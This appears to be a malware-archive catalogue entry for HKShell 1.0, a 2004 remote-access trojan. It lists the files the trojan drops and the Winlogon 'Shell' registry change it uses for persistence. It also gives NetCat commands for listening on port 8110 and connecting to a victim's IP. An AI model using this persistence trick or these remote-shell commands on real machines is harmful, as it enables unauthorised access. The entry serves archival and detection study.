HKShell 1.0
Released 20 years, 1 month ago. December 2004
Copyright © MegaSecurity
By xHydra
Informations
From | China |
Author | xHydra |
Family | HKShell |
Category | Remote Access |
Version | HKShell 1.0 |
Released Date | Dec 2004, 20 years, 1 month ago. |
Language | Microsoft Visual C++ |
Additional Information
Dropped files:
c:\WINDOWS\system32\inject.exe Size: 2,032 bytes
c:\WINDOWS\system32\rshell32.dll Size: 3,024 bytes
added to registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"
old data: Explorer.exe
new data: Explorer.exe inject.exe
tested on Windows XP
March 16, 2005
Author Information / Description
To be used with NetCat
nc.exe -vv -l -p 8110
nc.exe -vv Victim_Ip port
If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.